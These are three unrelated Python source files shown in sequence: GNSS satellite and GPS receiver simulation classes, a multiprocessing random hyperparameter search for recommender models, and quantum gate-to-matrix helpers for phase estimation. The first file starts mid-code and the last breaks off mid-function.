                    ma[row, col] = self.misalign_sig[row] * np.random.randn()
            self._sf = np.eye(3) + np.diag(sf) + ma
        return self._sf
"""
-------------------------------------------------------------------------------
------------------------------- GNSS Sensors ----------------------------------
-------------------------------------------------------------------------------
"""
class BaseSV(metaclass=abc.ABCMeta):
    """ Base class for GNSS Space Vehicles.
    Constellations should define their own SV class that properly accounts for
    their propagation and error models. Inherited classes must define
    :py:meth:`gncpy.sensors.BaseSV.propagate`
    Attributes:
        true_pos_ECEF (3 x 1 numpy array): Position of SV in ECEF coordinates
            from orbital mechanics
        real_pos_ECEF (3 x 1 numpy array): True position corrupted by errors
    """

    def __init__(self, **kwargs):
        # Empty (0-size) arrays mean "not yet propagated".
        self.true_pos_ECEF = np.array([[]])
        self.real_pos_ECEF = np.array([[]])

    @abc.abstractmethod
    def propagate(self, time, **kwargs):
        """ Calculates SV position at a given time.
        This must be defined by child classes.
        Args:
            time (float): Time to find position
        """
        pass
class BaseConstellation:
    """ Base class for GNSS constellations.
    Collects common functionality between different constellations and provides
    a common interface.
    Attributes:
        sats (dict): Dictionary of :py:class:`gncpy.sensors.BaseSV` objects
    """

    def __init__(self, **kwargs):
        self.sats = {}

    def propagate(self, time, **kwargs):
        """ Propagate all SV's to the given time.
        Args:
            time (float): Time to find position
            **kwargs : passed through to :py:meth:`gncpy.sensors.BaseSV.propagate`
        """
        for sat in self.sats.values():
            sat.propagate(time, **kwargs)
class BaseGNSSReceiver(metaclass=abc.ABCMeta):
    """ Defines the interface for common GNSS Receiver functions.
    Attributes:
        max_channels (int): Maximum number of signals to track
        mask_angle (float): Masking angle in degrees
    """

    def __init__(self, **kwargs):
        self.max_channels = kwargs.get('max_channels', 12)
        self.mask_angle = kwargs.get('mask_angle', 0)

    @abc.abstractmethod
    def measure_PR(self, true_pos, const, **kwargs):
        """Measure pseudoranges; must be implemented by child classes."""
class GPSSat(BaseSV):
    """ Custom SV for GPS Constellation.
    Attributes:
        health (str): satellite health
        ecc (float): eccentricity
        toe (float): time of applicability/ephemeris in seconds
        inc (float): Orbital inclination in radians
        ascen_rate (float): Rate of right ascension in rad/s
        sqrt_a (float): Square root of semi-major axis in m^1/2
        ascen (float): Right ascension at week in radians
        peri (float): Argument of perigee in radians
        mean_anom (float): Mean anomaly in radians
        af0 (float): Zeroth order clock correction in seconds
        af1 (float): First order cloc correction in sec/sec
        week (int): Week number
    """

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.health = ''
        # All numeric ephemeris fields start at zero until an almanac is read.
        for field in ('ecc', 'toe', 'inc', 'ascen_rate', 'sqrt_a', 'ascen',
                      'peri', 'mean_anom', 'af0', 'af1', 'week'):
            setattr(self, field, 0)

    def propagate(self, time, **kwargs):
        """ Calculates the GPS SV's position at the given time
        Args:
            time (float): Time of week to find position
        """
        semimajor = self.sqrt_a ** 2
        mean_motion = np.sqrt(wgs84.MU / semimajor ** 3)
        # Wrap the time since ephemeris into +/- half a GPS week (604800 s).
        tk = time - self.toe
        if tk > 302400:
            tk -= 604800
        elif tk < -302400:
            tk += 604800
        # Kepler chain: mean anomaly -> eccentric anomaly -> true anomaly.
        mean_anom = self.mean_anom + mean_motion * tk
        ecc_anom = ecc_anom_from_mean(mean_anom, self.ecc, **kwargs)
        true_anom = true_anom_from_ecc(ecc_anom, self.ecc)
        arg_lat = true_anom + self.peri
        cor_ascen = correct_lon_ascend(self.ascen, self.ascen_rate, tk,
                                       self.toe)
        rad = semimajor * (1 - self.ecc * np.cos(ecc_anom))
        self.true_pos_ECEF = ecef_from_orbit(arg_lat, rad, cor_ascen, self.inc)
        # No error model applied yet: the "real" position equals the true one.
        self.real_pos_ECEF = self.true_pos_ECEF.copy()
class GPSConstellation(BaseConstellation):
    """ Handles the GPS constellation.
    This maintains the satellite list, file parsing operations, and propagation
    functions for the GPS satellite constellation.
    """

    def __init__(self, **kwargs):
        super().__init__(**kwargs)

    def parse_almanac(self, alm_f):
        """ Parses an almanac file to setup constellation parameters.
        Populates ``self.sats`` with one :py:class:`GPSSat` per PRN found.
        Args:
            alm_f (str): file path and name of almanac file
        """
        cur_prn = ''
        with io.open(alm_f, 'r') as fin:
            for line in fin:
                # Matching is done on lowercased substrings of each line.
                line = line.lower()
                if "almanac" in line:
                    # Section header line; ignore.
                    pass
                elif "id" in line:
                    # Start of a new SV record; satellites are keyed by PRN
                    # string (int round-trip strips leading zeros/whitespace).
                    string = line.split(":")[1]
                    cur_prn = str(int(string.strip()))
                    self.sats[cur_prn] = GPSSat()
                elif cur_prn and ":" in line:
                    val = line.split(":")[1].strip()
                    # NOTE: branch order matters below -- "rate of right" must
                    # be tested before "right ascen", which is a substring of
                    # the same almanac line.
                    if "health" in line:
                        self.sats[cur_prn].health = val
                    elif "eccentricity" in line:
                        self.sats[cur_prn].ecc = float(val)
                    elif "applicability" in line:
                        self.sats[cur_prn].toe = float(val)
                    elif "inclination" in line:
                        self.sats[cur_prn].inc = float(val)
                    elif "rate of right" in line:
                        self.sats[cur_prn].ascen_rate = float(val)
                    elif "sqrt" in line:
                        self.sats[cur_prn].sqrt_a = float(val)
                    elif "right ascen" in line:
                        self.sats[cur_prn].ascen = float(val)
                    elif "argument" in line:
                        self.sats[cur_prn].peri = float(val)
                    elif "mean anom" in line:
                        self.sats[cur_prn].mean_anom = float(val)
                    elif "af0" in line:
                        self.sats[cur_prn].af0 = float(val)
                    elif "af1" in line:
                        self.sats[cur_prn].af1 = float(val)
                    elif "week" in line:
                        self.sats[cur_prn].week = int(val)
class GPSReceiver(BaseGNSSReceiver):
    """ Emulates a GPS receiver.
    Manages the measurement functions for a GPS reciever, and models receiver
    and signal noise.
    Attributes:
        tracked_SVs (list): The PRNs of all SVs currently tracked
    Todo:
        Add PR error models
    """

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.tracked_SVs = []

    def measure_PR(self, true_pos, const, **kwargs):
        """ Measures the pseudorange to each satellite in the constellation
        Args:
            true_pos (3 x 1 numpy array): True receiver position in ECEF
            const (:py:class:`gncpy.sensors.GPSConstellation`): Constellation
                to use, propagated to current time
        Returns:
            (dict): Keys are PRN's and values are pseudoranges in meters
        Todo:
            add error terms
        """
        # Find every SV above the mask angle.
        new_SVs = {}
        for prn, sv in const.sats.items():
            diff = sv.real_pos_ECEF - true_pos
            los_NED = ecef_to_NED(true_pos, sv.real_pos_ECEF)
            los_NED = los_NED / np.sqrt(los_NED.T @ los_NED)
            # Bug fix: np.arctan2 takes two arguments (y, x); the original
            # passed the quotient as a single argument, raising a TypeError.
            # Elevation is the angle above the local horizontal (NED down +).
            # NOTE(review): elev is in radians while mask_angle is documented
            # in degrees -- confirm the intended units.
            elev = -np.arctan2(los_NED[2], np.sqrt(los_NED[0]**2
                                                   + los_NED[1]**2))
            if elev >= self.mask_angle:
                pr = np.sqrt(diff.T @ diff)
                new_SVs[prn] = pr
        tracked = {}
        if len(new_SVs) >= self.max_channels:
            # Prefer SVs that were already tracked. Bug fix: iterate over a
            # snapshot of the keys because entries are deleted inside the
            # loop (the original raised "dict changed size during iteration").
            for prn in list(new_SVs.keys()):
                if prn in self.tracked_SVs:
                    tracked[prn] = new_SVs[prn]
                    del new_SVs[prn]
        if len(tracked) < self.max_channels and len(new_SVs) > 0:
            # Fill the remaining channels with newly visible SVs.
            for prn in new_SVs.keys():
                if prn not in tracked:
                    tracked[prn] = new_SVs[prn]
                    if len(tracked) == self.max_channels:
                        break
        # Bug fix: store a list snapshot rather than a live dict view tied to
        # the local 'tracked' dict.
        self.tracked_SVs = list(tracked.keys())
        return tracked
|
<filename>ParameterTuning/RandomSearch.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on 10/03/2018
@author: <NAME>
"""
from ParameterTuning.AbstractClassSearch import AbstractClassSearch, DictionaryKeys, writeLog
from functools import partial
import traceback, pickle
import os, gc, math
import multiprocessing
from multiprocessing import Queue
from queue import Empty
def dump_garbage():
    """
    show us what's the garbage about
    """
    # Force a collection so gc.garbage is up to date.
    print("\nGARBAGE:")
    gc.collect()
    print("\nGARBAGE OBJECTS:")
    for pos, obj in enumerate(gc.garbage):
        text = str(obj)
        # Truncate long reprs to keep the output readable.
        if len(text) > 80:
            text = text[:80]
        print("POS: {}, type: {} \n\t s {} \n".format(pos, type(obj), text))
    print("\nDONE")
# gc.enable()
# gc.set_debug(gc.DEBUG_LEAK)
import itertools, random, time
def get_RAM_status():
    """Return (total, used, free) system RAM in MB from `free -t -m` (Linux only)."""
    total_line_fields = os.popen('free -t -m').readlines()[-1].split()[1:]
    tot_m, used_m, free_m = (int(field) for field in total_line_fields)
    return tot_m, used_m, free_m
def dereference_recommender_attributes(recommender_object):
    """Set every attribute of *recommender_object* to None to help the GC.

    No-op when the object is None.
    """
    if recommender_object is None:
        return
    attributes = recommender_object.__dict__
    # Assigning to existing keys does not resize the dict, so iterating it
    # directly is safe here.
    for name in attributes:
        attributes[name] = None
def get_memory_threshold_reached(max_ram_occupied_perc):
    """Return (threshold_reached, used_quota) for the given RAM limit fraction.

    The check is disabled (returns (False, 0.0)) when the limit is None.
    """
    if max_ram_occupied_perc is None:
        return False, 0.0
    tot_RAM, used_RAM, _ = get_RAM_status()
    allowed = tot_RAM * max_ram_occupied_perc
    return used_RAM > allowed, used_RAM / tot_RAM
import sys
class RandomSearch(AbstractClassSearch):
    """Random hyper-parameter search over the cartesian product of fit ranges.

    Builds every parameter combination, shuffles them, and evaluates up to
    ``n_cases`` of them, either in-process or across worker processes.
    """

    ALGORITHM_NAME = "RandomSearch"

    def __init__(self, recommender_class, URM_test = None, evaluation_function_validation=None):
        super(RandomSearch, self).__init__(recommender_class, URM_test = URM_test, evaluation_function_validation= evaluation_function_validation)

    def build_all_cases_to_evaluate(self, n_cases):
        """Return a list of parameter dicts covering all range combinations.

        The list is replicated so that it contains at least ``n_cases``
        entries.
        """
        hyperparamethers_range_dictionary = self.dictionary_input[DictionaryKeys.FIT_RANGE_KEYWORD_ARGS]
        key_list = list(hyperparamethers_range_dictionary.keys())
        # Unpack list ranges from hyperparamethers to validate onto
        # * operator allows to transform a list of objects into positional arguments
        test_cases = itertools.product(*hyperparamethers_range_dictionary.values())
        paramether_dictionary_list = []
        for current_case in test_cases:
            paramether_dictionary_to_evaluate = {}
            for index in range(len(key_list)):
                paramether_dictionary_to_evaluate[key_list[index]] = current_case[index]
            paramether_dictionary_list.append(paramether_dictionary_to_evaluate)
        # Replicate list if necessary
        paramether_dictionary_list = paramether_dictionary_list * math.ceil(n_cases/len(paramether_dictionary_list))
        return paramether_dictionary_list

    def search(self, dictionary_input, metric ="map", n_cases = 30, output_root_path = None, parallelPoolSize = None, parallelize = True,
               save_model = "best", max_ram_occupied_perc = None):
        """Run the search and return a copy of the best parameter dict found."""
        # Associate the params that will be returned by BayesianOpt object to those you want to save
        # E.g. with early stopping you know which is the optimal number of epochs only afterwards
        # but you might want to save it as well
        self.from_fit_params_to_saved_params = {}
        self.dictionary_input = dictionary_input.copy()
        self.output_root_path = output_root_path
        self.logFile = open(self.output_root_path + "_" + self.ALGORITHM_NAME + ".txt", "a")
        self.metric = metric
        self.model_counter = 0
        if max_ram_occupied_perc is None:
            self.max_ram_occupied_perc = 0.7
        else:
            # Try if current ram status is possible to read
            try:
                get_RAM_status()
                self.max_ram_occupied_perc = max_ram_occupied_perc
            except Exception:
                writeLog(self.ALGORITHM_NAME + ": Unable to read RAM status, ignoring max RAM setting", self.logFile)
                self.max_ram_occupied_perc = None
        if save_model in ["no", "best", "all"]:
            self.save_model = save_model
        else:
            raise ValueError(self.ALGORITHM_NAME + ": save_model not recognized, acceptable values are: {}, given is {}".format(
                ["no", "best", "all"], save_model))
        if parallelPoolSize is None:
            self.parallelPoolSize = 1
        else:
            self.parallelPoolSize = parallelPoolSize
        self.best_solution_val = None
        self.best_solution_parameters = None
        self.best_solution_object = None
        paramether_dictionary_list = self.build_all_cases_to_evaluate(n_cases)
        # Randomize ordering of cases
        random.shuffle(paramether_dictionary_list)
        self.runSingleCase_partial = partial(self.runSingleCase,
                                             metric = metric)
        if parallelize:
            self.run_multiprocess_search(paramether_dictionary_list, n_cases)
        else:
            self.run_singleprocess_search(paramether_dictionary_list, n_cases)
        # NOTE(review): if every case failed best_solution_val is still None
        # and this log line raises -- confirm whether that is acceptable.
        writeLog(self.ALGORITHM_NAME + ": Best config is: Config {}, {} value is {:.4f}\n".format(
            self.best_solution_parameters, metric, self.best_solution_val), self.logFile)
        return self.best_solution_parameters.copy()

    def update_on_new_result(self, process_object, num_cases_evaluated):
        """Record one finished evaluation; save models and track the best result."""
        paramether_dictionary_to_save = self.from_fit_params_to_saved_params_function(process_object.recommender,
                                                                                      process_object.paramether_dictionary_to_evaluate)
        if process_object.exception is not None:
            # Bug fix: the format string had two placeholders for three
            # arguments, so the exception text was silently dropped.
            writeLog(self.ALGORITHM_NAME + ": Exception for config {}: {} - {}\n".format(
                self.model_counter, paramether_dictionary_to_save, str(process_object.exception)), self.logFile)
            return
        if process_object.result_dict is None:
            # Bug fix: added the missing placeholder for the parameter dict.
            writeLog(self.ALGORITHM_NAME + ": Result is None for config {}: {}\n".format(
                self.model_counter, paramether_dictionary_to_save), self.logFile)
            return
        self.model_counter += 1
        if self.save_model == "all":
            print(self.ALGORITHM_NAME + ": Saving model in {}\n".format(self.output_root_path))
            process_object.recommender.saveModel(self.output_root_path, file_name="_model_{}".format(self.model_counter))
            pickle.dump(paramether_dictionary_to_save.copy(),
                        open(self.output_root_path + "_parameters_{}".format(self.model_counter), "wb"),
                        protocol=pickle.HIGHEST_PROTOCOL)
        if self.best_solution_val is None or self.best_solution_val < process_object.result_dict[self.metric]:
            writeLog(self.ALGORITHM_NAME + ": New best config found. Config {}: {} - results: {}\n".format(
                self.model_counter, paramether_dictionary_to_save, process_object.result_dict), self.logFile)
            pickle.dump(paramether_dictionary_to_save.copy(),
                        open(self.output_root_path + "_best_parameters", "wb"),
                        protocol=pickle.HIGHEST_PROTOCOL)
            self.best_solution_val = process_object.result_dict[self.metric]
            self.best_solution_parameters = paramether_dictionary_to_save.copy()
            # Release the previous best model's memory before replacing it.
            dereference_recommender_attributes(self.best_solution_object)
            self.best_solution_object = process_object.recommender
            # Always save best model separately
            if self.save_model != "no":
                print(self.ALGORITHM_NAME + ": Saving model in {}\n".format(self.output_root_path))
                process_object.recommender.saveModel(self.output_root_path, file_name="_best_model")
            if self.URM_test is not None:
                self.evaluate_on_test(self.URM_test)
        else:
            writeLog(self.ALGORITHM_NAME + ": Config is suboptimal. Config {}: {} - results: {}\n".format(
                self.model_counter, paramether_dictionary_to_save, process_object.result_dict), self.logFile)
            dereference_recommender_attributes(process_object.recommender)

    def run_singleprocess_search(self, paramether_dictionary_list, num_cases_max):
        """Evaluate the cases sequentially in the current process."""
        num_cases_evaluated = 0
        while num_cases_evaluated < num_cases_max:
            process_object = Process_object_data_and_evaluation(self.recommender_class, self.dictionary_input,
                                                                paramether_dictionary_list[num_cases_evaluated],
                                                                self.ALGORITHM_NAME, self.URM_validation, self.evaluation_function_validation)
            process_object.run("main")
            self.update_on_new_result(process_object, num_cases_evaluated)
            process_object = None
            num_cases_evaluated += 1

    def run_multiprocess_search(self, paramether_dictionary_list, num_cases_max):
        """Evaluate the cases on a pool of worker processes fed through queues.

        Jobs are handed out via `queue_job_todo` and collected from
        `queue_job_done`; workers may run significantly divergent times and
        the wrapper objects can be large, so parallel.pool is not suitable.
        """
        num_cases_evaluated = 0
        num_cases_started = 0
        num_cases_active = 0
        termination_sent = False
        process_list = [None] * self.parallelPoolSize
        queue_job_todo = Queue()
        queue_job_done = Queue()
        get_memory_threshold_reached_partial = partial(get_memory_threshold_reached,
                                                       max_ram_occupied_perc = self.max_ram_occupied_perc)
        for current_process_index in range(self.parallelPoolSize):
            newProcess = multiprocessing.Process(target=process_worker, args=(queue_job_todo, queue_job_done, current_process_index, get_memory_threshold_reached_partial, ))
            process_list[current_process_index] = newProcess
            newProcess.start()
            newProcess = None
            print("Started process: {}".format(current_process_index))
        memory_threshold_reached, memory_used_quota = get_memory_threshold_reached(self.max_ram_occupied_perc)
        while num_cases_evaluated < num_cases_max:
            # Create as many new jobs as needed
            # Stop: if the max number of paralle processes is reached or the max ram occupancy is reached
            #       if no other cases to explore
            # If no termination sent and active == 0, start one otherwise everything stalls
            # WARNING: apparently the function "queue_job_todo.empty()" is not reliable
            while ((num_cases_active < self.parallelPoolSize and not memory_threshold_reached) or (num_cases_active == 0)) \
                    and not termination_sent:
                memory_threshold_reached, memory_used_quota = get_memory_threshold_reached(self.max_ram_occupied_perc)
                if memory_threshold_reached:
                    writeLog(self.ALGORITHM_NAME + ": Memory threshold reached, occupied {:.4f} %\n".format(memory_used_quota), self.logFile)
                if num_cases_started < num_cases_max and not memory_threshold_reached:
                    # Bug fix: use self.evaluation_function_validation for
                    # consistency with run_singleprocess_search; the original
                    # referenced a nonexistent self.evaluation_function.
                    process_object = Process_object_data_and_evaluation(self.recommender_class, self.dictionary_input,
                                                                        paramether_dictionary_list[num_cases_started],
                                                                        self.ALGORITHM_NAME, self.URM_validation, self.evaluation_function_validation)
                    queue_job_todo.put(process_object)
                    num_cases_started += 1
                    num_cases_active += 1
                    process_object = None
                if num_cases_started >= num_cases_max and not termination_sent:
                    print("Termination sent")
                    queue_job_todo.put(None)
                    termination_sent = True
            # Read all completed jobs. WARNING: apparently the function "empty" is not reliable
            queue_job_done_is_empty = False
            while not queue_job_done_is_empty:
                try:
                    process_object = queue_job_done.get_nowait()
                    self.update_on_new_result(process_object, num_cases_evaluated)
                    num_cases_evaluated += 1
                    num_cases_active -= 1
                    process_object = None
                except Empty:
                    queue_job_done_is_empty = True
            time.sleep(1)
        # Remove the termination sentinel that workers keep re-queueing.
        queue_job_todo.get()
        for current_process in process_list:
            current_process.join()
            print("Joined {}".format(current_process))
def process_worker(queue_job_todo, queue_job_done, process_id, get_memory_threshold_reached):
    "Function to be used by the process, just run the wrapper object"
    job = queue_job_todo.get()
    memory_warning_printed = False
    while job is not None:
        # Wait until there is enough RAM before running the next job.
        memory_threshold_reached, memory_used_quota = get_memory_threshold_reached()
        if memory_threshold_reached:
            if not memory_warning_printed:
                memory_warning_printed = True
                print("Process: {} - Memory threshold reached, occupied {:.4f} %\n".format(process_id, memory_used_quota))
            time.sleep(5)
            continue
        memory_warning_printed = False
        job.run(process_id)
        # "Send" the finished wrapper object back to the main process.
        queue_job_done.put(job)
        # Dereference before blocking on the next get().
        job = None
        job = queue_job_todo.get()
    # Put the termination sentinel back so sibling workers also stop.
    queue_job_todo.put(None)
    print("Process: {} - Termination signal received".format(process_id))
    return
class Process_object_data_and_evaluation(object):
    """Wrapper that builds, fits and evaluates one recommender configuration.

    Instances are shipped between processes via queues; after :meth:`run`
    the result (or the raised exception) is stored on the object itself.
    """

    def __init__(self, recommender_class, dictionary_input, paramether_dictionary_to_evaluate, ALGORITHM_NAME,
                 URM_validation, evaluation_function):
        super(Process_object_data_and_evaluation, self).__init__()
        self.recommender_class = recommender_class
        self.URM_validation = URM_validation
        # Copies so later mutation by the caller cannot leak into the job.
        self.dictionary_input = dictionary_input.copy()
        self.paramether_dictionary_to_evaluate = paramether_dictionary_to_evaluate.copy()
        self.ALGORITHM_NAME = ALGORITHM_NAME
        self.evaluation_function = evaluation_function
        # Outcome slots, filled in by run().
        self.exception = None
        self.recommender = None
        self.result_dict = None

    def __del__(self):
        # Drop every attribute reference to help the GC reclaim big objects.
        attributes = self.__dict__
        for name in attributes:
            attributes[name] = None

    def run(self, process_id):
        """Instantiate, fit and evaluate the recommender; stores any exception."""
        try:
            # Create an object of the same class as the input, passing the
            # parameters as a dictionary.
            self.recommender = self.recommender_class(*self.dictionary_input[DictionaryKeys.CONSTRUCTOR_POSITIONAL_ARGS],
                                                      **self.dictionary_input[DictionaryKeys.CONSTRUCTOR_KEYWORD_ARGS])
            print(self.ALGORITHM_NAME + ": Process {} Config: {}".format(
                process_id, self.paramether_dictionary_to_evaluate))
            self.recommender.fit(*self.dictionary_input[DictionaryKeys.FIT_POSITIONAL_ARGS],
                                 **self.dictionary_input[DictionaryKeys.FIT_KEYWORD_ARGS],
                                 **self.paramether_dictionary_to_evaluate)
            self.result_dict = self.evaluation_function(self.recommender, self.URM_validation, self.paramether_dictionary_to_evaluate)
            print(self.ALGORITHM_NAME + ": Process {} Completed config: {} - result {}".format(
                process_id, self.paramether_dictionary_to_evaluate, self.result_dict))
            return
        except Exception as exception:
            traceback.print_exc()
            print(self.ALGORITHM_NAME + ": Process {} Exception {}".format(
                process_id, str(exception)))
            self.result_dict = None
            self.exception = exception
|
import numpy as np
import cmath
import string
from src.quantum_phase_estimation.quantumdecomp.quantum_decomp import matrix_to_qasm
from src.quantum_phase_estimation.quantumdecomp.quantum_decomp import U_to_CU
from src.quantum_phase_estimation.util_functions import change_domain
def get_unitary_operators_array(operator, nancillas, qubits):
    """Build, for each ancilla i, the controlled power U^(2^(nancillas-i)).

    ``operator`` may be a matrix, a 'QASM...' string, a generator key string,
    or a [key, argument] list for parameterised gates. Returns a list with
    one entry per ancilla: either a QASM string or a named-operator string.
    """
    arg = None
    if isinstance(operator, list):
        # [generator_key, argument] form for parameterised gates.
        arg = operator[1]
        operator = operator[0]
    if isinstance(operator, (np.ndarray, np.generic)):
        # It is a matrix
        matrix = operator
    elif 'QASM' in operator:
        # Raw QASM circuit: repeat it 2^(nancillas-i) times, then wrap the
        # repetition in a controlled version for ancilla i.
        array = []
        for i in range(1, nancillas + 1):
            power = 2 ** (nancillas - i)
            # Drop the leading 'QASM' header line.
            operation = '\n'.join(operator.split('\n')[1:])
            result_operation = operation
            # NOTE(review): this yields `power` concatenated copies and
            # assumes `operation` ends with a newline; otherwise the repeated
            # instructions run together -- confirm against the callers.
            for j in range(power - 1):
                result_operation += operation
            result_operation = 'QASM\n' + U_to_CU(qubits, i - 1, nancillas, result_operation)
            array.append(result_operation)
        return array
    else:
        # It is an generator key
        matrix = operator_to_matrix(operator, arg)
    array = []
    for i in range(1, nancillas + 1):
        power = 2**(nancillas - i)
        # Raise the matrix to the required power by repeated multiplication.
        result_matrix = matrix
        for j in range(power - 1):
            result_matrix = np.dot(matrix, result_matrix)
        #result_matrix = result_matrix.round(decimals=9)
        result_operator = matrix_to_operator(result_matrix)
        #print(result_matrix)
        if 'Invalid' in result_operator:
            # No named gate matches the powered matrix; synthesize controlled
            # QASM for it directly.
            result_operator = matrix_to_qasm(result_matrix, i-1, nancillas)
        # else:
        #     # This means there is an argument
        #     if ' ' in result_operator:
        #         parts = result_operator.split(' ')
        #         result_operator = f'{parts[0]} q[{nancillas}], {parts[1]}'
        #     else:
        #         result_operator = f'{result_operator} q[{nancillas}]'
        #     result_operator = 'QASM\n' + U_to_CU(qubits, i - 1, nancillas, result_operator + '\n')
        array.append(result_operator)
    return array
def operator_to_matrix(operator, arg=None):
    """Map a gate name (plus optional angle argument) to its unitary matrix.

    Returns an 'Invalid generator: ...' message string when the name is not
    recognised for the given argument form.
    """
    if arg is not None:
        # Parameterised (rotation / controlled-phase) gates.
        theta = float(arg)
        parameterised = {
            'Rx': np.array([[cmath.cos(theta / 2), -1j * cmath.sin(theta / 2)],
                            [1j * cmath.sin(theta / 2), cmath.cos(theta / 2)]]),
            'Ry': np.array([[cmath.cos(theta / 2), -cmath.sin(theta / 2)],
                            [cmath.sin(theta / 2), cmath.cos(theta / 2)]]),
            'Rz': np.array([[cmath.exp(-1j * theta / 2), 0],
                            [0, cmath.exp(1j * theta / 2)]]),
            'CR': np.array([[1, 0, 0, 0],
                            [0, 1, 0, 0],
                            [0, 0, 1, 0],
                            [0, 0, 0, cmath.exp(theta * 1j)]]),
            'CRk': np.array([[1, 0, 0, 0],
                             [0, 1, 0, 0],
                             [0, 0, 1, 0],
                             [0, 0, 0, cmath.exp((2 * cmath.pi * 1j) / 2 ** theta)]]),
        }
        return parameterised.get(operator, 'Invalid generator: There should be no argument for generator: ' + operator)
    # Fixed (argument-free) gates.
    fixed = {
        'X': np.array([[0, 1],
                       [1, 0]]),
        'Y': np.array([[0, -1j],
                       [1j, 0]]),
        'Z': np.array([[1, 0],
                       [0, -1]]),
        'H': (1/2**0.5) * np.array([[1, 1],
                                    [1, -1]]),
        'I': np.array([[1, 0],
                       [0, 1]]),
        'S': np.array([[1, 0],
                       [0, 1j]]),
        'Sdag': np.array([[1, 0],
                          [0, -1j]]),
        'T': np.array([[1, 0],
                       [0, cmath.exp((1j * cmath.pi) / 4)]]),
        'Tdag': np.array([[1, 0],
                          [0, cmath.exp((-1j * cmath.pi) / 4)]]),
        'CNOT': np.array([[1, 0, 0, 0],
                          [0, 1, 0, 0],
                          [0, 0, 0, 1],
                          [0, 0, 1, 0]]),
        'CX': np.array([[1, 0, 0, 0],
                        [0, 1, 0, 0],
                        [0, 0, 0, 1],
                        [0, 0, 1, 0]]),
        'CY': np.array([[1, 0, 0, 0],
                        [0, 1, 0, 0],
                        [0, 0, 0, -1j],
                        [0, 0, 1j, 0]]),
        'CZ': np.array([[1, 0, 0, 0],
                        [0, 1, 0, 0],
                        [0, 0, 1, 0],
                        [0, 0, 0, -1]]),
        'SWAP': np.array([[1, 0, 0, 0],
                          [0, 0, 1, 0],
                          [0, 1, 0, 0],
                          [0, 0, 0, 1]]),
        'Toffoli': np.array([[1, 0, 0, 0, 0, 0, 0, 0],
                             [0, 1, 0, 0, 0, 0, 0, 0],
                             [0, 0, 1, 0, 0, 0, 0, 0],
                             [0, 0, 0, 1, 0, 0, 0, 0],
                             [0, 0, 0, 0, 1, 0, 0, 0],
                             [0, 0, 0, 0, 0, 1, 0, 0],
                             [0, 0, 0, 0, 0, 0, 0, 1],
                             [0, 0, 0, 0, 0, 0, 1, 0]]),
    }
    return fixed.get(operator, 'Invalid generator: The given generator does not exist: ' + operator)
def matrix_to_operator(matrix, arg=None):
    """Map a gate matrix back to its name (inverse of operator_to_matrix).

    Args:
        matrix: numpy array with the gate matrix (2x2, 4x4 or 8x8).
        arg: Optional angle; when given, the parameterised gates
            (Rx/Ry/Rz/CR/CRk) built from it are also compared against.

    Returns:
        The gate name (with the angle appended for parameterised gates), or
        an error string when no known gate matches.

    Changes vs. original: removed the unused `eye` local and dead commented
    code; added the missing shape guard in the parameterised-gate loop (see
    BUG FIX below).
    """
    # Fixed (argument-free) gates, checked first. Rebuilt on every call;
    # could be hoisted to a module constant if this ever becomes hot.
    fixed_gates = {
        'X': np.array([[0, 1],
                       [1, 0]]),
        'Y': np.array([[0, -1j],
                       [1j, 0]]),
        'Z': np.array([[1, 0],
                       [0, -1]]),
        'H': (1 / 2 ** 0.5) * np.array([[1, 1],
                                        [1, -1]]),
        'S': np.array([[1, 0],
                       [0, 1j]]),
        'Sdag': np.array([[1, 0],
                          [0, -1j]]),
        'T': np.array([[1, 0],
                       [0, cmath.exp((1j * cmath.pi) / 4)]]),
        'Tdag': np.array([[1, 0],
                          [0, cmath.exp((-1j * cmath.pi) / 4)]]),
        'CNOT': np.array([[1, 0, 0, 0],
                          [0, 1, 0, 0],
                          [0, 0, 0, 1],
                          [0, 0, 1, 0]]),
        'CX': np.array([[1, 0, 0, 0],
                        [0, 1, 0, 0],
                        [0, 0, 0, 1],
                        [0, 0, 1, 0]]),
        'CY': np.array([[1, 0, 0, 0],
                        [0, 1, 0, 0],
                        [0, 0, 0, -1j],
                        [0, 0, 1j, 0]]),
        'CZ': np.array([[1, 0, 0, 0],
                        [0, 1, 0, 0],
                        [0, 0, 1, 0],
                        [0, 0, 0, -1]]),
        'SWAP': np.array([[1, 0, 0, 0],
                          [0, 0, 1, 0],
                          [0, 1, 0, 0],
                          [0, 0, 0, 1]]),
        'Toffoli': np.array([[1, 0, 0, 0, 0, 0, 0, 0],
                             [0, 1, 0, 0, 0, 0, 0, 0],
                             [0, 0, 1, 0, 0, 0, 0, 0],
                             [0, 0, 0, 1, 0, 0, 0, 0],
                             [0, 0, 0, 0, 1, 0, 0, 0],
                             [0, 0, 0, 0, 0, 1, 0, 0],
                             [0, 0, 0, 0, 0, 0, 0, 1],
                             [0, 0, 0, 0, 0, 0, 1, 0]]),
    }
    for key, value in fixed_gates.items():
        if matrix.shape == value.shape:
            if np.isclose(matrix, value).all():
                print('Rounded')  # NOTE(review): debug leftover; kept to preserve behavior
                return key
    if arg is not None:
        arg = float(arg)
        parameterised = {
            'Rx': np.array([[cmath.cos(arg / 2), -1j * cmath.sin(arg / 2)],
                            [1j * cmath.sin(arg / 2), cmath.cos(arg / 2)]]),
            'Ry': np.array([[cmath.cos(arg / 2), -cmath.sin(arg / 2)],
                            [cmath.sin(arg / 2), cmath.cos(arg / 2)]]),
            'Rz': np.array([[cmath.exp(-1j * arg / 2), 0],
                            [0, cmath.exp(1j * arg / 2)]]),
            'CR': np.array([[1, 0, 0, 0],
                            [0, 1, 0, 0],
                            [0, 0, 1, 0],
                            [0, 0, 0, cmath.exp(arg * 1j)]]),
            'CRk': np.array([[1, 0, 0, 0],
                             [0, 1, 0, 0],
                             [0, 0, 1, 0],
                             [0, 0, 0, cmath.exp((2 * cmath.pi * 1j) / 2 ** arg)]]),
        }
        for key, value in parameterised.items():
            # BUG FIX: guard on shape before comparing. The original called
            # np.isclose on mismatched shapes (e.g. a 4x4 input vs the 2x2
            # Rx candidate), which raises a broadcasting ValueError.
            if matrix.shape == value.shape and np.isclose(matrix, value).all():
                return key + ' ' + str(arg)
        return 'Invalid generator: The given matrix does not require an argument or the matrix is invalid'
    else:
        # No argument is given so we try to find the R gate ourselves
        if matrix.shape == (2, 2):
            # R
            if matrix[0][1] == 0 and matrix[1][0] == 0:
                # Rz: diagonal, so the angle sits in the phase of the first entry.
